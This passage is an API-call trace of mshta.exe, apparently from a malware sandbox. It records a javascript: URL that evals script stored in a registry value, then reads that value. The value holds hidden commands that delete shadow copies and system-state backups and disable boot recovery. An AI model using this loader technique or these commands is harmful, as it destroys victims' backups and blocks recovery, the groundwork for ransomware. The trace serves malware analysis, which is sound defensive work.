guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x18f5d4 | out: ppvObject=0x18f5d4*=0x643cd4) returned 0x0 [0071.874] GetCurrentThreadId () returned 0x2a8 [0071.875] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f688 | out: phkResult=0x18f688*=0x21c) returned 0x0 [0071.875] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f68c | out: phkResult=0x18f68c*=0x220) returned 0x0 [0071.875] RegOpenKeyExW (in: hKey=0x220, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x18f648 | out: phkResult=0x18f648*=0x0) returned 0x2 [0071.875] RegOpenKeyExW (in: hKey=0x21c, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x18f648 | out: phkResult=0x18f648*=0x0) returned 0x2 [0071.876] RegCloseKey (hKey=0x0) returned 0x6 [0071.876] RegCloseKey (hKey=0x0) returned 0x6 [0071.876] RegCloseKey (hKey=0x21c) returned 0x0 [0071.876] RegCloseKey (hKey=0x220) returned 0x0 [0071.879] StrToIntW (lpSrc="6573520") returned 6573520 [0071.879] CoTaskMemFree (pv=0x62d7f8) [0071.880] IUnknown:AddRef (This=0x63be1c) returned 0x4 [0071.880] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pdwZone=0x18f67c, dwFlags=0x0 | out: pdwZone=0x18f67c*=0xffffffff) returned 0x800c0011 [0071.881] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0071.881] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 
[0071.881] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0071.881] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", dwAction=0x1400, pPolicy=0x18f680, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x18f680*=0x0) returned 0x0 [0071.881] IUnknown:Release (This=0x63be1c) returned 0x3 [0071.881] CoCreateInstance (in: rclsid=0x18f634*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74c495b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x18f5f0 | out: ppv=0x18f5f0*=0x28c0488) returned 0x0 [0072.899] malloc (_Size=0x80) returned 0x3bdbb0 [0072.899] GetVersion () returned 0x1db10106 [0072.899] __dllonexit () returned 0x74a57ecf [0072.900] __dllonexit () returned 0x74a57e9b [0072.900] __dllonexit () returned 0x74a57eb5 [0072.900] __dllonexit () returned 0x74a57f70 [0072.949] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0072.950] GetProcAddress (hModule=0x77710000, lpProcName="RegisterTraceGuidsA") returned 0x77ca848f [0072.950] EtwRegisterTraceGuidsA () returned 0x0 [0072.950] GetProcAddress (hModule=0x77710000, lpProcName="RegisterTraceGuidsA") returned 0x77ca848f [0072.950] EtwRegisterTraceGuidsA () returned 0x0 [0072.950] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dfa4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0072.952] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExA") returned 0x77724907 [0072.952] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", 
ulOptions=0x0, samDesired=0x1, phkResult=0x18e0c8 | out: phkResult=0x18e0c8*=0x0) returned 0x2 [0072.958] GetVersion () returned 0x1db10106 [0072.958] DllGetClassObject (in: rclsid=0x640ca0*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), riid=0x7666ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18e8b4 | out: ppv=0x18e8b4*=0x3bfe00) returned 0x0 [0072.958] ??2@YAPAXI@Z () returned 0x3bfe00 [0072.959] JScriptEngine5:IClassFactory:CreateInstance (in: This=0x3bfe00, pUnkOuter=0x0, riid=0x18f260*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x18e8a0 | out: ppvObject=0x18e8a0*=0x28c0488) returned 0x0 [0072.959] ??2@YAPAXI@Z () returned 0x28c0488 [0072.959] GetUserDefaultLCID () returned 0x409 [0072.959] GetACP () returned 0x4e4 [0072.959] JScriptEngine5:IUnknown:AddRef (This=0x28c0488) returned 0x2 [0072.959] JScriptEngine5:IUnknown:Release (This=0x28c0488) returned 0x1 [0072.960] JScriptEngine5:IUnknown:Release (This=0x3bfe00) returned 0x0 [0072.960] ??3@YAXPAX@Z () returned 0x1 [0072.960] JScriptEngine5:IUnknown:QueryInterface (in: This=0x28c0488, riid=0x74c495b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x18f594 | out: ppvObject=0x18f594*=0x28c0488) returned 0x0 [0072.960] JScriptEngine5:IUnknown:Release (This=0x28c0488) returned 0x1 [0072.960] IUnknown:AddRef (This=0x63be1c) returned 0x4 [0072.960] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pdwZone=0x18f504, dwFlags=0x0 | out: pdwZone=0x18f504*=0xffffffff) returned 0x800c0011 [0072.960] CoInternetIsFeatureEnabled 
(FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0072.960] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0072.960] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0072.960] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", dwAction=0x1401, pPolicy=0x18f508, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x18f508*=0x0) returned 0x0 [0072.960] IUnknown:Release (This=0x63be1c) returned 0x3 [0072.960] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x54) returned 0x66cdb8 [0072.979] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x66df50 [0072.979] GetCurrentThreadId () returned 0x2a8 [0072.979] ??2@YAPAXI@Z () returned 0x3bfe00 [0072.979] GetCurrentThreadId () returned 0x2a8 [0072.979] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f430 | out: phkResult=0x18f430*=0x224) returned 0x0 [0072.980] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0072.980] RegQueryValueExA (in: hKey=0x224, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x18f424, lpData=0x18f428, lpcbData=0x18f42c*=0x4 | out: lpType=0x18f424*=0x4, lpData=0x18f428*=0x1, lpcbData=0x18f42c*=0x4) returned 0x0 [0072.980] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0072.980] RegCloseKey (hKey=0x224) returned 0x0 [0072.980] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76620000 [0072.980] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObjectContext") returned 0x7666632b [0072.980] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0072.981] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0072.981] CoCreateInstance (in: 
rclsid=0x74a423a8*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74a423b8*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f42c | out: ppv=0x18f42c*=0x76766460) returned 0x0 [0072.981] ??2@YAPAXI@Z () returned 0x3bfe38 [0072.981] ??_U@YAPAXI@Z () returned 0x3b13c0 [0072.981] ??2@YAPAXI@Z () returned 0x3bfec8 [0072.981] ??2@YAPAXI@Z () returned 0x28c06a0 [0072.982] ??2@YAPAXI@Z () returned 0x3bff00 [0072.983] GetCurrentThreadId () returned 0x2a8 [0072.983] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x18f3d0, nSize=0x27 | out: lpBuffer="") returned 0x0 [0072.983] GetCurrentThreadId () returned 0x2a8 [0072.984] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0072.984] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18f440, cchData=6 | out: lpLCData="1252") returned 5 [0072.984] IsValidCodePage (CodePage=0x4e4) returned 1 [0072.984] GetCurrentThreadId () returned 0x2a8 [0072.984] GetCurrentThreadId () returned 0x2a8 [0072.984] CoCreateInstance (in: rclsid=0x74a415ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74a415fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x28c0674 | out: ppv=0x28c0674*=0x65e300) returned 0x0 [0072.985] IUnknown:AddRef (This=0x65e300) returned 0x2 [0072.985] GetCurrentProcessId () returned 0x5bc [0072.985] GetCurrentThreadId () returned 0x2a8 [0072.985] GetTickCount () returned 0x1148ce5 [0072.985] ISystemDebugEventFire:BeginSession (This=0x65e300, guidSourceID=0x74a416d4, strSessionName="JScript:00001468:00000680:18124005") returned 0x0 [0072.985] GetCurrentThreadId () returned 0x2a8 [0072.985] 
GetCurrentThreadId () returned 0x2a8 [0072.985] ??2@YAPAXI@Z () returned 0x3bff68 [0072.994] GetCurrentThreadId () returned 0x2a8 [0072.994] StrCmpICW (pszStr1="window", pszStr2="window") returned 0 [0072.994] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x66bce0 [0072.994] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f39c | out: ppv=0x18f39c*=0x6368d8) returned 0x0 [0072.994] ??2@YAPAXI@Z () returned 0x3bffa0 [0072.994] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x76766460, pUnk=0x3bffa0, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x3bffbc | out: pdwCookie=0x3bffbc*=0x100) returned 0x0 [0072.995] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x3bffa0, riid=0x766597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18f320 | out: ppvObject=0x18f320*=0x0) returned 0x80004002 [0072.995] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x3bffa0, riid=0x76663e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18f310 | out: ppvObject=0x18f310*=0x0) returned 0x80004002 [0072.995] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x3bffa0) returned 0x2 [0072.995] IUnknown:AddRef (This=0x6368d8) returned 0x2 [0072.995] IUnknown:Release (This=0x6368d8) returned 0x1 [0072.995] ??2@YAPAXI@Z () returned 0x28c0998 [0072.995] GetTickCount () returned 0x1148ce5 [0072.995] ??2@YAPAXI@Z () returned 0x28c0fe8 [0072.995] malloc (_Size=0x40) returned 0x28c1058 [0072.995] malloc (_Size=0x104) returned 0x28c10a0 [0072.995] ??2@YAPAXI@Z () returned 0x3bffc8 [0072.995] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, 
Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f3b8 | out: ppv=0x18f3b8*=0x6368d8) returned 0x0 [0072.995] IUnknown:Release (This=0x6368d8) returned 0x1 [0072.995] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f3b8 | out: ppv=0x18f3b8*=0x6368d8) returned 0x0 [0072.995] IUnknown:Release (This=0x6368d8) returned 0x1 [0072.996] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x66df68 [0072.996] GetCurrentThreadId () returned 0x2a8 [0072.996] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x66df80 [0072.996] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x6707e0 [0072.996] GetCurrentThreadId () returned 0x2a8 [0072.996] realloc (_Block=0x0, _Size=0xc8) returned 0x28c11b0 [0072.996] ??2@YAPAXI@Z () returned 0x28c1280 [0072.997] malloc (_Size=0x804) returned 0x28c12a8 [0072.997] ??2@YAPAXI@Z () returned 0x28c1ab8 [0072.997] malloc (_Size=0x104) returned 0x28c1c20 [0072.997] malloc (_Size=0x204) returned 0x28c1d30 [0072.997] ??3@YAXPAX@Z () returned 0x1 [0072.997] malloc (_Size=0x40) returned 0x28c1f40 [0072.999] malloc (_Size=0x284) returned 0x28c1f88 [0073.000] ??2@YAPAXI@Z () returned 0x3b13d0 [0073.000] free (_Block=0x28c12a8) [0073.000] ??3@YAXPAX@Z () returned 0x1 [0073.000] free (_Block=0x28c1f40) [0073.000] free (_Block=0x28c1d30) [0073.000] free (_Block=0x28c1c20) [0073.000] ??2@YAPAXI@Z () returned 0x28c1280 [0073.000] ??2@YAPAXI@Z () returned 0x28c12b8 [0073.000] malloc (_Size=0xc) returned 0x28c12d8 [0073.000] ??2@YAPAXI@Z () returned 0x28c12f0 [0073.001] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f4d8 | out: ppv=0x18f4d8*=0x6368d8) returned 0x0 [0073.001] IUnknown:Release (This=0x6368d8) returned 0x1 
[0073.001] ??2@YAPAXI@Z () returned 0x28c1338 [0073.001] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f528 | out: ppv=0x18f528*=0x6368d8) returned 0x0 [0073.001] IUnknown:Release (This=0x6368d8) returned 0x1 [0073.001] ??2@YAPAXI@Z () returned 0x28c13a8 [0073.002] ISystemDebugEventFire:IsActive (This=0x65e300) returned 0x1 [0073.002] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f524 | out: ppv=0x18f524*=0x6368d8) returned 0x0 [0073.002] IUnknown:Release (This=0x6368d8) returned 0x1 [0073.002] malloc (_Size=0x658) returned 0x28c1428 [0073.002] GetCurrentThreadId () returned 0x2a8 [0073.003] GetCurrentThreadId () returned 0x2a8 [0073.003] ??2@YAPAXI@Z () returned 0x28c1a88 [0073.004] ??2@YAPAXI@Z () returned 0x28c1af0 [0073.004] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76620000 [0073.005] GetProcAddress (hModule=0x76620000, lpProcName="CLSIDFromProgIDEx") returned 0x76630782 [0073.005] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x18f0ec | out: lpclsid=0x18f0ec*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0073.007] SysStringLen (param_1=0x0) returned 0x0 [0073.007] GetProcAddress (hModule=0x76620000, lpProcName="CoGetClassObject") returned 0x766554ad [0073.007] CoGetClassObject (in: rclsid=0x18f0ec*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x74a4087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f0e0 | out: ppv=0x18f0e0*=0x28c1b60) returned 0x0 [0074.221] malloc (_Size=0x80) returned 
0x3bdcc0 [0074.221] GetVersionExA (in: lpVersionInformation=0x18dcc4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2, dwMinorVersion=0x80, dwBuildNumber=0x77c6e026, dwPlatformId=0x76f9f761, szCSDVersion="|Ý\x18") | out: lpVersionInformation=0x18dcc4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0074.221] GetUserDefaultLCID () returned 0x409 [0074.221] DllGetClassObject (in: rclsid=0x640cd4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), riid=0x18ed90*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18e448 | out: ppv=0x18e448*=0x28c1b60) returned 0x0 [0074.221] ??2@YAPAXI@Z () returned 0x28c1b60 [0074.221] WshShell:IUnknown:AddRef (This=0x28c1b60) returned 0x2 [0074.222] WshShell:IUnknown:Release (This=0x28c1b60) returned 0x1 [0074.222] WshShell:IUnknown:QueryInterface (in: This=0x28c1b60, riid=0x74a4087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18f00c | out: ppvObject=0x18f00c*=0x28c1b60) returned 0x0 [0074.222] WshShell:IUnknown:Release (This=0x28c1b60) returned 0x1 [0074.222] ??2@YAPAXI@Z () returned 0x28c1b78 [0074.222] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18ef68, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0074.222] lstrlenA (lpString="\\wscript.exe") returned 12 [0074.222] lstrlenA (lpString="C:\\Windows\\SysWOW64\\mshta.exe") returned 29 [0074.222] _strcmpi (_Str1="64\\mshta.exe", _Str2="\\wscript.exe") returned -1 [0074.222] _strcmpi (_Str1="64\\mshta.exe", _Str2="\\cscript.exe") returned -1 [0074.222] ??3@YAXPAX@Z () returned 0x1 [0074.223] LoadRegTypeLib (in: rguid=0x74a014bc*(Data1=0xf935dc20, Data2=0x1cf0, 
Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x18f10c*=0x0 | out: pptlib=0x18f10c*=0x6720e0) returned 0x0 [0074.235] ITypeLib:GetTypeInfoOfGuid (in: This=0x6720e0, GUID=0x74a014cc, ppTInfo=0x18f0f0 | out: ppTInfo=0x18f0f0*=0x67387c) returned 0x0 [0074.236] ITypeInfo:GetRefTypeOfImplType (in: This=0x67387c, index=0xffffffff, pRefType=0x18f0e4 | out: pRefType=0x18f0e4*=0xfffffffe) returned 0x0 [0074.236] ITypeInfo:GetRefTypeInfo (in: This=0x67387c, hreftype=0xfffffffe, ppTInfo=0x74a1501c | out: ppTInfo=0x74a1501c*=0x6738a8) returned 0x0 [0074.236] IUnknown:Release (This=0x67387c) returned 0x1 [0074.236] IUnknown:Release (This=0x6720e0) returned 0x1 [0074.236] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.237] ITypeInfo:LocalGetIDsOfNames (This=0x6738a8) returned 0x0 [0074.237] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.237] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.237] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0074.237] ITypeInfo:LocalInvoke (This=0x6738a8) returned 0x0 [0074.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\[M[ZF\\HMEYE", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0074.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\[M[ZF\\HMEYE", cchWideChar=-1, lpMultiByteStr=0x18edd0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\[M[ZF\\HMEYE", lpUsedDefaultChar=0x0) returned 26 [0074.238] _mbsnbcmp (_Str1=0x18edd0, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0074.238] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\[M[ZF", ulOptions=0x0, samDesired=0x1, phkResult=0x18eda8 | out: phkResult=0x18eda8*=0x240) returned 0x0 [0074.238] RegQueryValueExA (in: hKey=0x240, 
lpValueName="HMEYE", lpReserved=0x0, lpType=0x18ee1c, lpData=0x0, lpcbData=0x18ee20*=0x398e78 | out: lpType=0x18ee1c*=0x1, lpData=0x0, lpcbData=0x18ee20*=0x164) returned 0x0 [0074.238] RegQueryValueExA (in: hKey=0x240, lpValueName="HMEYE", lpReserved=0x0, lpType=0x18ee1c, lpData=0x18ec60, lpcbData=0x18ee20*=0x164 | out: lpType=0x18ee1c*=0x1, lpData="o=new ActiveXObject(\"WScript.Shell\");o.Run(\"cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0\",0);o.Run(\"cmd.exe /c wmic SHADOWCOPY DELETE\",0);o.Run(\"cmd.exe /c vssadmin Delete Shadows /All /Quiet\",0);o.Run(\"cmd.exe /c bcdedit /set {default} recoveryenabled No\",0);o.Run(\"cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures\",0);", lpcbData=0x18ee20*=0x164) returned 0x0 [0074.238] RegCloseKey (hKey=0x240) returned 0x0 [0074.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ec60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 356 [0074.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ec60, cbMultiByte=-1, lpWideCharStr=0x6743bc, cchWideChar=356 | out: lpWideCharStr="o=new ActiveXObject(\"WScript.Shell\");o.Run(\"cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0\",0);o.Run(\"cmd.exe /c wmic SHADOWCOPY DELETE\",0);o.Run(\"cmd.exe /c vssadmin Delete Shadows /All /Quiet\",0);o.Run(\"cmd.exe /c bcdedit /set {default} recoveryenabled No\",0);o.Run(\"cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures\",0);") returned 356 [0074.239] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.239] ??2@YAPAXI@Z () returned 0x28c1ba8 [0074.239] malloc (_Size=0x804) returned 0x28c2218 [0074.239] ??2@YAPAXI@Z () returned 0x28c1bd0 [0074.239] malloc (_Size=0x104) returned 0x28c1d38 [0074.240] malloc (_Size=0x204) returned 0x28c2a28 [0074.240] malloc (_Size=0x404) returned 0x28c2c38 [0074.240] ??3@YAXPAX@Z () returned 0x1 [0074.240] malloc (_Size=0x40) returned 0x28c1e48 [0074.240] malloc 
(_Size=0x6a8) returned 0x28c3048 [0074.241] ??2@YAPAXI@Z () returned 0x28c1b60 [0074.241] free (_Block=0x28c2218) [0074.241] ??3@YAXPAX@Z () returned 0x1 [0074.241] free (_Block=0x28c1e48) [0074.241] free (_Block=0x28c2c38) [0074.241] free (_Block=0x28c2a28) [0074.241] free (_Block=0x28c1d38) [0074.241] ??2@YAPAXI@Z () returned 0x28c1ba8 [0074.241] ??2@YAPAXI@Z () returned 0x28c1be0 [0074.242] GetCurrentThreadId () returned 0x2a8 [0074.243] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x24) returned 0x650a60 [0074.243] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.243] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.243] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x658908 [0074.243] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30c) returned 0x674690 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66bd00 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66bd20 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66bd40 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66bd60 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66bd80 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66bda0 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66bdc0 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66bde0 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66be00 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66be20 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 